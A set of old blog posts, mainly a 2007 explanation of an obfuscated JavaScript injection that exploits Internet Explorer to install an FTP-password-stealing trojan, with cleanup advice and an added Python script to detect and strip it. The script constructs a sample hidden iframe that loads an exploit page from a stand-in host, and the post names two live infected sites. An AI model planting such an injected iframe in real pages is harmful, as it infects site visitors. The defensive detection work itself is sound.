What is this "<!--[O]--><script>document.write(…" mysterious code block in some web sites’ source code?
August 5th, 2007
I must warn you not to use Internet Explorer while you are reading this post.
Your computer might get infected by a computer virus otherwise! If you are paranoid, you can disable JavaScript in your browser too.
If you are not using Internet Explorer (or Maxthon, which is built on the same rendering engine) you can go on reading.
It is a long line of JavaScript code that the HTML source of some web sites contains,
usually at the very top or the very bottom of the source.
I’ve created a screen shot to show you how it looks.
Do you know what it is?
It is malicious JavaScript that exploits a buffer overflow vulnerability in Internet Explorer.
Microsoft Internet Explorer (IE) contains a buffer overflow vulnerability
that can be exploited to execute arbitrary code with the privileges of the user running IE
(on a typical Windows XP installation that is an administrator account, so the attacker gets the whole machine).
The script tries to download and run a binary, a trojan.
Your computer gets infected immediately by a trojan such as Win32/Spy.Delf.NEY
when you visit such an "infected" web site with Internet Explorer on Windows XP SP1.
Other browsers might crash or close themselves. Firefox, for instance, immediately terminates itself when you visit such a page.
How do web sites get infected?
At first I believed the files on the server were modified through a vulnerable CMS or blog engine. That is not the case.
It is the infected computer that injects the malicious code into all files in the root of the web server, using the FTP accounts stored on that computer, without its owner noticing anything, of course.
Once your computer is infected, the virus tries to steal the FTP passwords stored on it.
It is confirmed that the virus can easily steal all FTP passwords from Total Commander’s configuration file, as the
passwords are not encrypted (or at best obfuscated with a fixed scheme: whatever the program can decode without asking you, the trojan can decode too).
Many web developers, including me, use Total Commander.
Although it is not advisable to store passwords, we do it because we are too lazy to type the password every time.
What to do when your computer or web site is infected by such a trojan
- Do not panic! It cannot get worse.
- Remove the virus from your computer. The best option is to restore the system partition from an archive. The second option is to remove the virus with an antivirus. Make sure you disconnect your computer from the internet while you are doing it.
- If your computer is clean, remove the stored passwords from Total Commander.
- Now you need to check all your web sites one by one for the infection. Do not use Internet Explorer, your computer might catch the infection again.
  Download all the files of your web sites via FTP and search for the malicious JavaScript code. You can use Total Commander’s "Find Files" feature (ALT-F7, "Find text") for this.
  You will be looking for all files that contain the string <!--[O]--><script>document.write(unescape.
  If you find infected files, remove the JavaScript code from them. Then you can upload the cleaned files back to the server.
- Now you need to change all your FTP passwords, as the virus might have sent them to someone else. Whoever holds the old passwords can re-infect the site at any time, so do this before you consider the site clean.
- Last but not least, you should update your browser.
- There is something else. Maybe you should notify your web site’s visitors about the infection ;)
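As an added example (not part of the original post, and not the trojan's real payload), here is a small Python script that does the "Find Files" step on a copy of a site downloaded via FTP: it finds every file carrying the marker, decodes the unescape() argument so you can see what the injected script actually writes into the page, and strips the block from the files. The sample pages, the iframe payload and the host name exploit-host.invalid are constructed for this example.

```python
"""Added example (not part of the original post): find, decode and strip
the injected <!--[O]--><script>document.write(unescape(...)) block from a
copy of a web site downloaded via FTP.  The sample pages, the iframe
payload and the host exploit-host.invalid are constructed for this
example; they are not the trojan's real payload."""
import os
import re
import tempfile
from urllib.parse import quote

MARKER = '<!--[O]--><script>document.write(unescape'

# One injection block: the HTML comment marker, document.write(unescape('...'))
# with the payload in a single- or double-quoted string, and the closing tag.
INJECTION_RE = re.compile(
    r'<!--\[O\]--><script>document\.write\(unescape\((["\'])(.*?)\1\)\);?</script>',
    re.DOTALL)


def decode_payload(escaped):
    """Mimic JavaScript unescape(): %uXXXX and %XX become one character each."""
    return re.sub(r'%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})',
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), escaped)


def find_injections(html):
    """Return the decoded payload of every injection block found in a page."""
    return [decode_payload(m.group(2)) for m in INJECTION_RE.finditer(html)]


def clean_html(html):
    """Strip every injection block; return (cleaned page, number of blocks removed)."""
    return INJECTION_RE.subn('', html)


def _read(path):
    # surrogateescape keeps odd bytes intact so cleaned files round-trip unchanged
    with open(path, encoding='utf-8', errors='surrogateescape') as fh:
        return fh.read()


def scan_tree(root):
    """Map file path -> decoded payloads for every file under root carrying the marker."""
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            text = _read(path)
            if MARKER in text:
                hits[path] = find_injections(text)
    return hits


def disinfect_tree(root):
    """Rewrite infected files in place; return the sorted list of paths cleaned."""
    cleaned = []
    for path in scan_tree(root):
        new_text, removed = clean_html(_read(path))
        if removed:
            with open(path, 'w', encoding='utf-8', errors='surrogateescape') as fh:
                fh.write(new_text)
            cleaned.append(path)
    return sorted(cleaned)


# Constructed sample payload: such obfuscated lines commonly hide a tiny
# iframe that loads the exploit page from the attacker's server.
PAYLOAD = ('<iframe src="http://exploit-host.invalid/in.cgi?3" '
           'width=1 height=1 style="visibility:hidden"></iframe>')
INJECTION = MARKER + "('" + quote(PAYLOAD, safe='') + "'));</script>"
CLEAN_PAGE = '<html><body><h1>Shop</h1></body></html>\n'
INFECTED_PAGE = CLEAN_PAGE + INJECTION + '\n'


def demo():
    """Build a three-file site in a temp dir, scan it, clean it, and report."""
    root = tempfile.mkdtemp()
    for name, text in (('index.html', INFECTED_PAGE),
                       ('about.php', INFECTED_PAGE),
                       ('style.css', 'body { margin: 0 }\n')):
        with open(os.path.join(root, name), 'w', encoding='utf-8') as fh:
            fh.write(text)
    found = scan_tree(root)
    cleaned = disinfect_tree(root)
    return {
        'infected': sorted(os.path.basename(p) for p in found),
        'payloads': sorted({p for plist in found.values() for p in plist}),
        'cleaned': [os.path.basename(p) for p in cleaned],
        'still_infected': len(scan_tree(root)),
    }


if __name__ == '__main__':
    for key, value in demo().items():
        print(key, value)
```

To use it on a real download, call scan_tree('path/to/site') to list the hits together with what each decoded payload would write into the page, then disinfect_tree('path/to/site') and upload the cleaned files. The regular expression matches only this particular marker; a variant of the injection needs a new pattern, so searching the tree for plain "document.write(unescape" as well is a cheap second check.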
It can be very embarrassing if your web site is infected with such code. You might receive a few unfriendly e-mails from visitors or customers.
The worst thing is that you can lose many visitors or customers. Your web site can easily lose its good name and the trust of its users in a few hours or days.
The sooner you detect and resolve the infection the better. As an example, here are two links to infected web sites:
novepc.sk, webtest.sk. The first is
an online store selling computer hardware and the latter is a website collecting some of the most beautiful Slovak and Czech websites.
It is visited especially by web designers (Total Commander is very popular in Slovakia, too ;)).
My backup strategy
August 23rd, 2006
Recently one of my new SATA disks crashed and I lost some data, fortunately nothing crucial. After a full day of work I had a running system again; reinstalling everything took me a whole day. So I could not work for a day, which had an impact on my income too, not to mention the unexpected extra expenses (more about that later). What can I do to avoid such inconveniences in the future?
I should have had backups of the crucial data. But is it enough to make regular backups of your data? Well, you can do much more than that. Read on to learn my backup rules.
They fit my needs and I hope some aspects of them might be useful to others as well.
Rule 1: do not store any data on your system partition!
This is the most important rule. Let me explain the reason. The likelihood that your Windows will not start one day because of a virus infection or similar is much higher than the likelihood that it will not start because of disk errors. Windows is pretty fragile: you do not have to do anything special to turn a stable Windows into an unstable and slow one, and many times you have to reinstall the whole system because you cannot fix it. And when that happens to you, I bet you will forget to archive some of your crucial data: your precious bookmarks from your browsers, your e-mails from Outlook, your documents from the My Documents folder, your Total Commander FTP account settings (wcx_ftp.ini) from the Windows folder, your php.ini file from the Windows folder, and I could go on till the evening with the list of things you should archive before reinstalling Windows. You see, it is a very bad idea to store any data on the system partition. But how can you avoid it? I am afraid some data cannot be stored anywhere but on the system partition. There are two possibilities:
Regularly copy data from system partition to another partition
Data that must be stored on the system partition must be archived (naturally the archive is created on another partition, it would not make much sense otherwise). There is a great free tool for this task: SyncToy by Microsoft. This easy-to-use, customizable tool helps you copy, move, rename, and delete files between folders and computers. You will need to identify all the data that is important to you on your system partition (probably your C: drive). SyncToy can even be scheduled so that it creates the archives automatically, say every evening (read the SyncToy documentation to learn how to run it from Windows Scheduled Tasks).
Here is my list of things I found worth archiving (screen shot).
SyncToy does not work on older Windows versions, but never mind. You can use another great built-in tool, Backup Utility for Windows (ntbackup).
Few people know about this tool, although it ships with every version of Windows 2000 and Windows XP (on XP Home it has to be installed from the Windows CD; correct me if I am wrong, I did not check this). Here is how you can start it: Start -> Programs -> Accessories -> System Tools -> Backup.
Try to store as much data as possible on another partitions
I succeeded in changing the default folder location of:
- My Documents
- How to Change the Default Location of the My Documents Folder
- Outlook Express
Rule 2: regularly archive your system partition
Since reinstalling Windows and all the software you need takes a great deal of time (at least a whole day), you should avoid it. The system partition cannot be archived just by copying all the files from drive C: into a folder on another drive. An image must be created of the whole partition, which is an identical copy of the partition. Whenever your Windows gets spoilt or infected by some nasty virus, you just restore the entire partition from the image file. Keep in mind that the image restores exactly what was on the partition at the time, infection included, so only take images of a system you know to be clean. But hang on a sec. You will need to buy some extra hardware and maybe software to ease your life a bit. Do not worry, it will not cost you much.
List of things you will need to obtain:
First of all I recommend you to buy a mobile rack (either SATA or ATA). I chose VP-15USB2 because it was pretty cheap.
You also need a hard drive (PATA/UDMA or SATA, depending on the mobile rack you bought) which you will use only for archiving, nothing else. Its capacity should not be less than 60GB. Low-capacity drives are sold at discount prices these days, so it will not be expensive.
You also need drive image backup software for creating image archives of the entire system partition. I was looking for a freeware tool for quite a while and found a few, but none of them fit my needs (either it did not support SATA or it was too complicated, without a GUI). So I looked for a cheap alternative. Luckily I found one which does exactly what I needed, nothing more and nothing less: Image for Windows. After I wrote this blog post I found a freeware tool called DrvImagerXP (read this review of the tool).
How to archive your Windows?
Prepare your backup hard disk:
First of all, you need to create at least two partitions on your backup drive. The first partition will hold a bootable copy of Windows and the second will store the backup image files. Next you must clone your system partition onto the first partition of your backup drive. Probably you first need to create an image archive of the system partition and then restore the system from that archive, choosing the first partition of the backup drive as the target. You also need to mark this partition active to be able to boot from it (Image for Windows can do that for you).
Creating image archives regularly:
I only attach the backup hard drive (using the mobile rack; do not forget to shut down your computer before attaching the drive, not all mobile racks support hot swap) when I need it, either to create a new archive of the system partition or to restore it completely from an earlier archive. It is quite important that you keep your backup hard drive in a safe place and use it only when needed for archiving. A drive that is unplugged most of the time is also out of reach of the next virus, which is the whole point.
I use Image for Windows and create a drive image backup every weekend. The software can be run directly from Windows. The archive image file is stored on the backup disk. I keep older archive files too, as I have enough space on the disk. It takes the software only a few minutes to create the archive image. I was quite impressed how quickly the image file was created. And its size is only about 2GB.
How do you restore your Windows?
You simply attach your backup drive to the computer and boot from it. You might need to change the boot sequence in your BIOS settings; I do not have to, my computer boots from the backup drive automatically. Once the clone Windows has booted and you have logged in, you restore the system partition from the latest image file. Then you switch off your computer, remove the archive drive, switch it on again, and everything works again. You are able to restore your Windows in about 20 minutes, and without any data loss as long as you followed Rule 1 and kept your data off the system partition.
Recently my computer was infected by a trojan which made Windows run very slowly. I took my backup drive, started Windows from it, and restored the system from the latest archive. It did not take me more than 20 minutes and I could continue with my work where I had left off!
Rule 3 - Backup, backup, backup all crucial data
Critical data should be backed up on a regular basis.
You should consider using RAID 1
If you use your computer for business, you are highly recommended to set up a RAID 1 array. It will cost you the price of a second hard disk identical to the one you already have. Keep in mind that a mirror only protects you against one disk dying: a deleted file, a virus or a broken Windows is mirrored to both disks instantly, so RAID 1 complements the backups above, it does not replace them.
How to create an archive file under Linux?
July 20th, 2006
If you have shell access to your web site you might find this command useful. I use it to archive my web site. It comes in handy especially if you have hundreds of files on the server, so downloading them one by one via FTP would take very long.
You log in to your shell account with an SSH client (I use PuTTY). Then you navigate to the folder whose content you wish to archive. The following creates a gzip-compressed tar archive of the entire folder, including sub folders and hidden files such as .htaccess. The archive is written one level up: a plain * would skip the dot-files, and an archive created inside the folder being archived gets picked up by tar itself.
tar -czvf ../archive_name.tar.gz .
List the archive with tar -tzf ../archive_name.tar.gz to check it, then download it via FTP (in binary mode) and delete it from the server so that nobody else can fetch it.

